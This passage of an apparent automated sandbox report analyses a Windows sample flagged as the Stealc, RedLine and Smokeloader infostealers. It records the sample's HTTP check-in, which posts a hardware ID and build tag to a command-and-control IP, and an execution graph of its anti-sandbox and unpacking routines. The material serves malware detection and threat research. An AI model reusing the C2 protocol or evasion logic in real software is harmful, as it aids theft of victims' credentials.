                                    Cache-Control: no-cache
                                    Oct 8, 2024 08:13:05.396223068 CEST203INHTTP/1.1 200 OK
                                    Date: Tue, 08 Oct 2024 06:13:05 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Oct 8, 2024 08:13:05.402528048 CEST420OUTPOST /f88d87a7e087e100.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHID
                                    Host: 62.122.184.144
                                    Content-Length: 219
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 41 37 35 36 30 37 42 31 46 43 33 30 37 31 38 35 39 34 36 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 2d 2d 0d 0a
                                    Data Ascii: ------AKFCBFHJDHJKECAKEHIDContent-Disposition: form-data; name="hwid"A3A75607B1FC3071859460------AKFCBFHJDHJKECAKEHIDContent-Disposition: form-data; name="build"default5_pal------AKFCBFHJDHJKECAKEHID--
                                    Oct 8, 2024 08:13:05.733539104 CEST210INHTTP/1.1 200 OK
                                    Date: Tue, 08 Oct 2024 06:13:05 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 8
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                    Data Ascii: YmxvY2s=


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:02:12:55
                                    Start date:08/10/2024
                                    Path:C:\Users\user\Desktop\gMkw55jZRs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\gMkw55jZRs.exe"
                                    Imagebase:0x400000
                                    File size:336'384 bytes
                                    MD5 hash:CDE961132C60BEC82F2FD8340BF376B3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1904673836.00000000009AA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1904696174.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1688352446.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:02:12:58
                                    Start date:08/10/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 804
                                    Imagebase:0xca0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:02:12:59
                                    Start date:08/10/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 824
                                    Imagebase:0xca0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:02:13:00
                                    Start date:08/10/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 856
                                    Imagebase:0xca0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:02:13:01
                                    Start date:08/10/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 864
                                    Imagebase:0xca0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:02:13:01
                                    Start date:08/10/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 980
                                    Imagebase:0xca0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:02:13:02
                                    Start date:08/10/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 1124
                                    Imagebase:0xca0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:15
                                    Start time:02:13:05
                                    Start date:08/10/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 1060
                                    Imagebase:0xca0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:6.7%
                                      Dynamic/Decrypted Code Coverage:4.9%
                                      Signature Coverage:12.2%
                                      Total number of Nodes:1418
                                      Total number of Limit Nodes:28
                                      execution_graph 27669 409440 strlen malloc strcpy_s free std::exception::exception 27738 92ae93 43 API calls ctype 27739 920297 149 API calls 27740 41ce48 LeaveCriticalSection __initptd 27670 41b050 6 API calls 2 library calls 27671 923823 StrCmpCA StrCmpCA StrCmpCA strtok_s 27711 92118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27672 92102b StrCmpCA strtok_s 27712 92cd8f 6 API calls 2 library calls 27774 406f60 memcpy 27674 41dc60 atexit 27675 920cb6 30 API calls 27775 410765 279 API calls 27676 9204b7 88 API calls 27746 417667 lstrcpy 27747 916ebc VirtualProtect 27748 41b270 5 API calls 2 library calls 27714 92cd90 173 API calls 2 library calls 27749 9232ae 22 API calls 27680 92d0af RtlLeaveCriticalSection __initptd 27681 9230d0 9 API calls 27684 923823 10 API calls 27685 41bc11 71 API calls 2 library calls 27778 9213c7 strtok_s strtok_s 27687 92102b StrCmpCA StrCmpCA strtok_s 27689 9230f9 7 API calls 27690 41ac2c 71 API calls 2 library calls 27721 9219e7 6 API calls 27722 9235e4 9 API calls 27692 92cce9 162 API calls ___crtLCMapStringA 27758 9215b3 18 API calls ctype 27693 4090c3 5 API calls allocator 27782 9212eb strtok_s lstrlen lstrcpy 27783 41abd0 free moneypunct std::exception::_Tidy 27627 910005 27632 91092b GetPEB 27627->27632 27629 910030 27633 91003c 27629->27633 27632->27629 27634 910049 27633->27634 27648 910e0f SetErrorMode SetErrorMode 27634->27648 27639 910265 27640 9102ce VirtualProtect 27639->27640 27642 91030b 27640->27642 27641 910439 VirtualFree 27646 9105f4 LoadLibraryA 27641->27646 27647 9104be 27641->27647 27642->27641 27643 9104e3 LoadLibraryA 27643->27647 27645 9108c7 27646->27645 27647->27643 27647->27646 27649 910223 27648->27649 27650 910d90 27649->27650 27651 910dad 27650->27651 27652 910dbb GetPEB 27651->27652 27653 910238 VirtualAlloc 27651->27653 27652->27653 27653->27639 27724 92d106 41 API calls __amsg_exit 27761 926a0a ExitProcess 27785 413916 91 API calls 2 library calls 27786 4183dc 15 API calls 27654 9aaa3e 27655 9aaa4d 27654->27655 27658 9ab1de 27655->27658 27661 9ab1f9 27658->27661 27659 9ab202 CreateToolhelp32Snapshot 27660 9ab21e Module32First 27659->27660 27659->27661 27662 9ab22d 27660->27662 27663 9aaa56 27660->27663 27661->27659 27661->27660 27665 9aae9d 27662->27665 27666 9aaec8 27665->27666 27667 9aaed9 VirtualAlloc 27666->27667 27668 9aaf11 27666->27668 27667->27668 27668->27668 27789 919b37 7 API calls 27697 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27698 921c35 110 API calls 27763 41ceea SetUnhandledExceptionFilter 26209 4169f0 26252 402260 26209->26252 26226 417850 3 API calls 26227 416a30 26226->26227 26228 4178e0 3 API calls 26227->26228 26229 416a43 26228->26229 26385 41a9b0 26229->26385 26231 416a64 26232 41a9b0 4 API calls 26231->26232 26233 416a6b 26232->26233 26234 41a9b0 4 API calls 26233->26234 26235 416a72 26234->26235 26236 41a9b0 4 API calls 26235->26236 26237 416a79 26236->26237 26238 41a9b0 4 API calls 26237->26238 26239 416a80 26238->26239 26393 41a8a0 26239->26393 26241 416b0c 26397 416920 GetSystemTime 26241->26397 26242 416a89 26242->26241 26244 416ac2 OpenEventA 26242->26244 26246 416af5 CloseHandle Sleep 26244->26246 26247 416ad9 26244->26247 26249 416b0a 26246->26249 26251 416ae1 CreateEventA 26247->26251 26249->26242 26250 416b16 CloseHandle ExitProcess 26251->26241 26594 4045c0 17 API calls 26252->26594 26254 402274 26255 4045c0 34 API calls 26254->26255 26256 40228d 26255->26256 26257 4045c0 34 API calls 26256->26257 26258 4022a6 26257->26258 26259 4045c0 34 API calls 26258->26259 26260 4022bf 26259->26260 26261 4045c0 34 API calls 26260->26261 26262 4022d8 26261->26262 26263 4045c0 34 API calls 26262->26263 26264 4022f1 26263->26264 26265 4045c0 34 API calls 26264->26265 26266 40230a 26265->26266 26267 4045c0 34 API calls 26266->26267 26268 402323 26267->26268 26269 4045c0 34 API calls 26268->26269 26270 40233c 26269->26270 26271 4045c0 34 API calls 26270->26271 26272 402355 26271->26272 26273 4045c0 34 API calls 26272->26273 26274 40236e 26273->26274 26275 4045c0 34 API calls 26274->26275 26276 402387 26275->26276 26277 4045c0 34 API calls 26276->26277 26278 4023a0 26277->26278 26279 4045c0 34 API calls 26278->26279 26280 4023b9 26279->26280 26281 4045c0 34 API calls 26280->26281 26282 4023d2 26281->26282 26283 4045c0 34 API calls 26282->26283 26284 4023eb 26283->26284 26285 4045c0 34 API calls 26284->26285 26286 402404 26285->26286 26287 4045c0 34 API calls 26286->26287 26288 40241d 26287->26288 26289 4045c0 34 API calls 26288->26289 26290 402436 26289->26290 26291 4045c0 34 API calls 26290->26291 26292 40244f 26291->26292 26293 4045c0 34 API calls 26292->26293 26294 402468 26293->26294 26295 4045c0 34 API calls 26294->26295 26296 402481 26295->26296 26297 4045c0 34 API calls 26296->26297 26298 40249a 26297->26298 26299 4045c0 34 API calls 26298->26299 26300 4024b3 26299->26300 26301 4045c0 34 API calls 26300->26301 26302 4024cc 26301->26302 26303 4045c0 34 API calls 26302->26303 26304 4024e5 26303->26304 26305 4045c0 34 API calls 26304->26305 26306 4024fe 26305->26306 26307 4045c0 34 API calls 26306->26307 26308 402517 26307->26308 26309 4045c0 34 API calls 26308->26309 26310 402530 26309->26310 26311 4045c0 34 API calls 26310->26311 26312 402549 26311->26312 26313 4045c0 34 API calls 26312->26313 26314 402562 26313->26314 26315 4045c0 34 API calls 26314->26315 26316 40257b 26315->26316 26317 4045c0 34 API calls 26316->26317 26318 402594 26317->26318 26319 4045c0 34 API calls 26318->26319 26320 4025ad 26319->26320 26321 4045c0 34 API calls 26320->26321 26322 4025c6 26321->26322 26323 4045c0 34 API calls 26322->26323 26324 4025df 26323->26324 26325 4045c0 34 API calls 26324->26325 26326 4025f8 26325->26326 26327 4045c0 34 API calls 26326->26327 26328 402611 26327->26328 26329 4045c0 34 API calls 26328->26329 26330 40262a 26329->26330 26331 4045c0 34 API calls 26330->26331 26332 402643 26331->26332 26333 4045c0 34 API calls 26332->26333 26334 40265c 26333->26334 26335 4045c0 34 API calls 26334->26335 26336 402675 26335->26336 26337 4045c0 34 API calls 26336->26337 26338 40268e 26337->26338 26339 419860 26338->26339 26598 419750 GetPEB 26339->26598 26341 419868 26342 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26341->26342 26343 41987a 26341->26343 26344 419af4 GetProcAddress 26342->26344 26345 419b0d 26342->26345 26346 41988c 21 API calls 26343->26346 26344->26345 26347 419b46 26345->26347 26348 419b16 GetProcAddress GetProcAddress 26345->26348 26346->26342 26349 419b68 26347->26349 26350 419b4f GetProcAddress 26347->26350 26348->26347 26351 419b71 GetProcAddress 26349->26351 26352 419b89 26349->26352 26350->26349 26351->26352 26353 416a00 26352->26353 26354 419b92 GetProcAddress GetProcAddress 26352->26354 26355 41a740 26353->26355 26354->26353 26356 41a750 26355->26356 26357 416a0d 26356->26357 26358 41a77e lstrcpy 26356->26358 26359 4011d0 26357->26359 26358->26357 26360 4011e8 26359->26360 26361 401217 26360->26361 26362 40120f ExitProcess 26360->26362 26363 401160 GetSystemInfo 26361->26363 26364 401184 26363->26364 26365 40117c ExitProcess 26363->26365 26366 401110 GetCurrentProcess VirtualAllocExNuma 26364->26366 26367 401141 ExitProcess 26366->26367 26368 401149 26366->26368 26599 4010a0 VirtualAlloc 26368->26599 26371 401220 26603 4189b0 26371->26603 26374 40129a 26377 416770 GetUserDefaultLangID 26374->26377 26375 401249 __aulldiv 26375->26374 26376 401292 ExitProcess 26375->26376 26378 4167d3 GetUserDefaultLCID 26377->26378 26379 416792 26377->26379 26378->26226 26379->26378 26380 4167c1 ExitProcess 26379->26380 26381 4167a3 ExitProcess 26379->26381 26382 4167b7 ExitProcess 26379->26382 26383 4167cb ExitProcess 26379->26383 26384 4167ad ExitProcess 26379->26384 26605 41a710 26385->26605 26387 41a9c1 lstrlenA 26389 41a9e0 26387->26389 26388 41aa18 26606 41a7a0 26388->26606 26389->26388 26391 41a9fa lstrcpy lstrcatA 26389->26391 26391->26388 26392 41aa24 26392->26231 26394 41a8bb 26393->26394 26395 41a90b 26394->26395 26396 41a8f9 lstrcpy 26394->26396 26395->26242 26396->26395 26610 416820 26397->26610 26399 41698e 26400 416998 sscanf 26399->26400 26639 41a800 26400->26639 26402 4169aa SystemTimeToFileTime SystemTimeToFileTime 26403 4169e0 26402->26403 26404 4169ce 26402->26404 26406 415b10 26403->26406 26404->26403 26405 4169d8 ExitProcess 26404->26405 26407 415b1d 26406->26407 26408 41a740 lstrcpy 26407->26408 26409 415b2e 26408->26409 26641 41a820 lstrlenA 26409->26641 26412 41a820 2 API calls 26413 415b64 26412->26413 26414 41a820 2 API calls 26413->26414 26415 415b74 26414->26415 26645 416430 26415->26645 26418 41a820 2 API calls 26419 415b93 26418->26419 26420 41a820 2 API calls 26419->26420 26421 415ba0 26420->26421 26422 41a820 2 API calls 26421->26422 26423 415bad 26422->26423 26424 41a820 2 API calls 26423->26424 26425 415bf9 26424->26425 26654 4026a0 26425->26654 26433 415cc3 26434 416430 lstrcpy 26433->26434 26435 415cd5 26434->26435 26436 41a7a0 lstrcpy 26435->26436 26437 415cf2 26436->26437 26438 41a9b0 4 API calls 26437->26438 26439 415d0a 26438->26439 26440 41a8a0 lstrcpy 26439->26440 26441 415d16 26440->26441 26442 41a9b0 4 API calls 26441->26442 26443 415d3a 26442->26443 26444 41a8a0 lstrcpy 26443->26444 26445 415d46 26444->26445 26446 41a9b0 4 API calls 26445->26446 26447 415d6a 26446->26447 26448 41a8a0 lstrcpy 26447->26448 26449 415d76 26448->26449 26450 41a740 lstrcpy 26449->26450 26451 415d9e 26450->26451 27380 417500 GetWindowsDirectoryA 26451->27380 26454 41a7a0 lstrcpy 26455 415db8 26454->26455 27390 404880 26455->27390 26457 415dbe 27536 4117a0 26457->27536 26459 415dc6 26460 41a740 lstrcpy 26459->26460 26461 415de9 26460->26461 26462 401590 lstrcpy 26461->26462 26463 415dfd 26462->26463 27556 405960 39 API calls moneypunct 26463->27556 26465 415e03 27557 411050 strtok_s strtok_s lstrlenA lstrcpy 26465->27557 26467 415e0e 26468 41a740 lstrcpy 26467->26468 26469 415e32 26468->26469 26470 401590 lstrcpy 26469->26470 26471 415e46 26470->26471 27558 405960 39 API calls moneypunct 26471->27558 26473 415e4c 27559 410d90 7 API calls 26473->27559 26475 415e57 26476 41a740 lstrcpy 26475->26476 26477 415e79 26476->26477 26478 401590 lstrcpy 26477->26478 26479 415e8d 26478->26479 27560 405960 39 API calls moneypunct 26479->27560 26481 415e93 27561 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26481->27561 26483 415e9e 26484 401590 lstrcpy 26483->26484 26485 415eb5 26484->26485 27562 411a10 121 API calls 26485->27562 26487 415eba 26488 41a740 lstrcpy 26487->26488 26489 415ed6 26488->26489 27563 404fb0 8 API calls 26489->27563 26491 415edb 26492 401590 lstrcpy 26491->26492 26493 415f5b 26492->26493 27564 410740 292 API calls 26493->27564 26495 415f60 26496 41a740 lstrcpy 26495->26496 26497 415f86 26496->26497 26498 401590 lstrcpy 26497->26498 26499 415f9a 26498->26499 27565 405960 39 API calls moneypunct 26499->27565 26501 415fa0 27566 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26501->27566 26503 415fab 26504 401590 lstrcpy 26503->26504 26505 415feb 26504->26505 27567 401e80 67 API calls 26505->27567 26507 415ff0 26508 416000 26507->26508 26509 416092 26507->26509 26511 41a740 lstrcpy 26508->26511 26510 41a7a0 lstrcpy 26509->26510 26512 4160a5 26510->26512 26513 416020 26511->26513 26514 401590 lstrcpy 26512->26514 26515 401590 lstrcpy 26513->26515 26517 4160b9 26514->26517 26516 416034 26515->26516 27568 405960 39 API calls moneypunct 26516->27568 27571 405960 39 API calls moneypunct 26517->27571 26520 41603a 27569 4112d0 21 API calls moneypunct 26520->27569 26521 4160bf 27572 413560 36 API calls 26521->27572 26524 41608a 26527 41610b 26524->26527 26529 401590 lstrcpy 26524->26529 26525 416045 26526 401590 lstrcpy 26525->26526 26528 416085 26526->26528 26531 416130 26527->26531 26534 401590 lstrcpy 26527->26534 27570 413dc0 75 API calls 26528->27570 26533 4160e7 26529->26533 26532 416155 26531->26532 26535 401590 lstrcpy 26531->26535 26537 41617a 26532->26537 26542 401590 lstrcpy 26532->26542 27573 4140b0 64 API calls moneypunct 26533->27573 26538 41612b 26534->26538 26540 416150 26535->26540 26543 41619f 26537->26543 26544 401590 lstrcpy 26537->26544 27575 414780 116 API calls moneypunct 26538->27575 27576 414bb0 67 API calls moneypunct 26540->27576 26541 4160ec 26547 401590 lstrcpy 26541->26547 26548 416175 26542->26548 26545 4161c4 26543->26545 26550 401590 lstrcpy 26543->26550 26549 41619a 26544->26549 26552 4161e9 26545->26552 26558 401590 lstrcpy 26545->26558 26551 416106 26547->26551 27577 414d70 75 API calls 26548->27577 27578 414f40 69 API calls moneypunct 26549->27578 26556 4161bf 26550->26556 27574 415100 71 API calls 26551->27574 26554 416210 26552->26554 26559 401590 lstrcpy 26552->26559 26560 416220 26554->26560 26561 4162b3 26554->26561 27579 407710 125 API calls moneypunct 26556->27579 26563 4161e4 26558->26563 26564 416209 26559->26564 26566 41a740 lstrcpy 26560->26566 26565 41a7a0 lstrcpy 26561->26565 27580 415050 67 API calls moneypunct 26563->27580 27581 419010 54 API calls moneypunct 26564->27581 26569 4162c6 26565->26569 26570 416241 26566->26570 26571 401590 lstrcpy 26569->26571 26572 401590 lstrcpy 26570->26572 26573 4162da 26571->26573 26574 416255 26572->26574 27585 405960 39 API calls moneypunct 26573->27585 27582 405960 39 API calls moneypunct 26574->27582 26577 4162e0 27586 413560 36 API calls 26577->27586 26578 41625b 27583 4112d0 21 API calls moneypunct 26578->27583 26581 4162ab 26585 41a7a0 lstrcpy 26581->26585 26582 416266 26583 401590 lstrcpy 26582->26583 26584 4162a6 26583->26584 27584 413dc0 75 API calls 26584->27584 26587 4162fc 26585->26587 26588 401590 lstrcpy 26587->26588 26589 416310 26588->26589 27587 405960 39 API calls moneypunct 26589->27587 26591 41631c 26593 416338 26591->26593 27588 416630 9 API calls moneypunct 26591->27588 26593->26250 26595 404697 26594->26595 26596 4046ac 11 API calls 26595->26596 26597 40474f 6 API calls 26595->26597 26596->26595 26597->26254 26598->26341 26601 4010c2 moneypunct 26599->26601 26600 4010fd 26600->26371 26601->26600 26602 4010e2 VirtualFree 26601->26602 26602->26600 26604 401233 GlobalMemoryStatusEx 26603->26604 26604->26375 26605->26387 26607 41a7c2 26606->26607 26608 41a7ec 26607->26608 26609 41a7da lstrcpy 26607->26609 26608->26392 26609->26608 26611 41a740 lstrcpy 26610->26611 26612 416833 26611->26612 26613 41a9b0 4 API calls 26612->26613 26614 416845 26613->26614 26615 41a8a0 lstrcpy 26614->26615 26616 41684e 26615->26616 26617 41a9b0 4 API calls 26616->26617 26618 416867 26617->26618 26619 41a8a0 lstrcpy 26618->26619 26620 416870 26619->26620 26621 41a9b0 4 API calls 26620->26621 26622 41688a 26621->26622 26623 41a8a0 lstrcpy 26622->26623 26624 416893 26623->26624 26625 41a9b0 4 API calls 26624->26625 26626 4168ac 26625->26626 26627 41a8a0 lstrcpy 26626->26627 26628 4168b5 26627->26628 26629 41a9b0 4 API calls 26628->26629 26630 4168cf 26629->26630 26631 41a8a0 lstrcpy 26630->26631 26632 4168d8 26631->26632 26633 41a9b0 4 API calls 26632->26633 26634 4168f3 26633->26634 26635 41a8a0 lstrcpy 26634->26635 26636 4168fc 26635->26636 26637 41a7a0 lstrcpy 26636->26637 26638 416910 26637->26638 26638->26399 26640 41a812 26639->26640 26640->26402 26642 41a83f 26641->26642 26643 415b54 26642->26643 26644 41a87b lstrcpy 26642->26644 26643->26412 26644->26643 26646 41a8a0 lstrcpy 26645->26646 26647 416443 26646->26647 26648 41a8a0 lstrcpy 26647->26648 26649 416455 26648->26649 26650 41a8a0 lstrcpy 26649->26650 26651 416467 26650->26651 26652 41a8a0 lstrcpy 26651->26652 26653 415b86 26652->26653 26653->26418 26655 4045c0 34 API calls 26654->26655 26656 4026b4 26655->26656 26657 4045c0 34 API calls 26656->26657 26658 4026d7 26657->26658 26659 4045c0 34 API calls 26658->26659 26660 4026f0 26659->26660 26661 4045c0 34 API calls 26660->26661 26662 402709 26661->26662 26663 4045c0 34 API calls 26662->26663 26664 402736 26663->26664 26665 4045c0 34 API calls 26664->26665 26666 40274f 26665->26666 26667 4045c0 34 API calls 26666->26667 26668 402768 26667->26668 26669 4045c0 34 API calls 26668->26669 26670 402795 26669->26670 26671 4045c0 34 API calls 26670->26671 26672 4027ae 26671->26672 26673 4045c0 34 API calls 26672->26673 26674 4027c7 26673->26674 26675 4045c0 34 API calls 26674->26675 26676 4027e0 26675->26676 26677 4045c0 34 API calls 26676->26677 26678 4027f9 26677->26678 26679 4045c0 34 API calls 26678->26679 26680 402812 26679->26680 26681 4045c0 34 API calls 26680->26681 26682 40282b 26681->26682 26683 4045c0 34 API calls 26682->26683 26684 402844 26683->26684 26685 4045c0 34 API calls 26684->26685 26686 40285d 26685->26686 26687 4045c0 34 API calls 26686->26687 26688 402876 26687->26688 26689 4045c0 34 API calls 26688->26689 26690 40288f 26689->26690 26691 4045c0 34 API calls 26690->26691 26692 4028a8 26691->26692 26693 4045c0 34 API calls 26692->26693 26694 4028c1 26693->26694 26695 4045c0 34 API calls 26694->26695 26696 4028da 26695->26696 26697 4045c0 34 API calls 26696->26697 26698 4028f3 26697->26698 26699 4045c0 34 API calls 26698->26699 26700 40290c 26699->26700 26701 4045c0 34 API calls 26700->26701 26702 402925 26701->26702 26703 4045c0 34 API calls 26702->26703 26704 40293e 26703->26704 26705 4045c0 34 API calls 26704->26705 26706 402957 26705->26706 26707 4045c0 34 API calls 26706->26707 26708 402970 26707->26708 26709 4045c0 34 API calls 26708->26709 26710 402989 26709->26710 26711 4045c0 34 API calls 26710->26711 26712 4029a2 26711->26712 26713 4045c0 34 API calls 26712->26713 26714 4029bb 26713->26714 26715 4045c0 34 API calls 26714->26715 26716 4029d4 26715->26716 26717 4045c0 34 API calls 26716->26717 26718 4029ed 26717->26718 26719 4045c0 34 API calls 26718->26719 26720 402a06 26719->26720 26721 4045c0 34 API calls 26720->26721 26722 402a1f 26721->26722 26723 4045c0 34 API calls 26722->26723 26724 402a38 26723->26724 26725 4045c0 34 API calls 26724->26725 26726 402a51 26725->26726 26727 4045c0 34 API calls 26726->26727 26728 402a6a 26727->26728 26729 4045c0 34 API calls 26728->26729 26730 402a83 26729->26730 26731 4045c0 34 API calls 26730->26731 26732 402a9c 26731->26732 26733 4045c0 34 API calls 26732->26733 26734 402ab5 26733->26734 26735 4045c0 34 API calls 26734->26735 26736 402ace 26735->26736 26737 4045c0 34 API calls 26736->26737 26738 402ae7 26737->26738 26739 4045c0 34 API calls 26738->26739 26740 402b00 26739->26740 26741 4045c0 34 API calls 26740->26741 26742 402b19 26741->26742 26743 4045c0 34 API calls 26742->26743 26744 402b32 26743->26744 26745 4045c0 34 API calls 26744->26745 26746 402b4b 26745->26746 26747 4045c0 34 API calls 26746->26747 26748 402b64 26747->26748 26749 4045c0 34 API calls 26748->26749 26750 402b7d 26749->26750 26751 4045c0 34 API calls 26750->26751 26752 402b96 26751->26752 26753 4045c0 34 API calls 26752->26753 26754 402baf 26753->26754 26755 4045c0 34 API calls 26754->26755 26756 402bc8 26755->26756 26757 4045c0 34 API calls 26756->26757 26758 402be1 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 402bfa 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 402c13 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 402c2c 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 402c45 26765->26766 26767 4045c0 34 API calls 26766->26767 26768 402c5e 26767->26768 26769 4045c0 34 API calls 26768->26769 26770 402c77 26769->26770 26771 4045c0 34 API calls 26770->26771 26772 402c90 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 402ca9 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 402cc2 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 402cdb 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 402cf4 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 402d0d 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 402d26 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 402d3f 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 402d58 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 402d71 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 402d8a 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 402da3 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 402dbc 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 402dd5 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 402dee 26799->26800 26801 4045c0 34 API calls 26800->26801 26802 402e07 26801->26802 26803 4045c0 34 API calls 26802->26803 26804 402e20 26803->26804 26805 4045c0 34 API calls 26804->26805 26806 402e39 26805->26806 26807 4045c0 34 API calls 26806->26807 26808 402e52 26807->26808 26809 4045c0 34 API calls 26808->26809 26810 402e6b 26809->26810 26811 4045c0 34 API calls 26810->26811 26812 402e84 26811->26812 26813 4045c0 34 API calls 26812->26813 26814 402e9d 26813->26814 26815 4045c0 34 API calls 26814->26815 26816 402eb6 26815->26816 26817 4045c0 34 API calls 26816->26817 26818 402ecf 26817->26818 26819 4045c0 34 API calls 26818->26819 26820 402ee8 26819->26820 26821 4045c0 34 API calls 26820->26821 26822 402f01 26821->26822 26823 4045c0 34 API calls 26822->26823 26824 402f1a 26823->26824 26825 4045c0 34 API calls 26824->26825 26826 402f33 26825->26826 26827 4045c0 34 API calls 26826->26827 26828 402f4c 26827->26828 26829 4045c0 